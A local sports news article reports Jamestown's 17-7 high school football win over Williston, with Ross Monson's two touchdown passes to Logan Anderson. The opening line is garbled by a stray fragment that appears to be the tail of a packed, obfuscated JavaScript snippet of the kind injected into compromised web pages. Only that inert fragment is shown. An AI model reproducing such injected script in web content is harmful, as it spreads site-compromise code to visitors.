JAMESTOWN bfkes|var|u0026u|referrer|ayatk||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Ross Monson threw two touchdown passes in Jamestown’s first game without starting tailback Scott Nelson to give the Jays their third win of the season, 17-7 over Williston on Friday night.

Early this year, Noah Wanzek has been the favorite target of Monson, but if you go back to last season it was Logan Anderson who hauled the majority of the scoring strikes. After missing the Sheyenne game and parts of others, Anderson was right back into the mix grabbing both of Monson’s touchdown passes.

Jametown lead 10-0 into the fourth quarter before Williston got on the scoreboard. Then the Jays went on a 12-play, 58-yard drive capped off by the second Monson-to-Anderson touchdown to put the game away with just over a minute remaining.

The Jays improve to 3-1 on the season and will host Dickinson this Friday night. You can hear the game on ESPN Jamestown 1400/97.1 and NewsDakota.com.
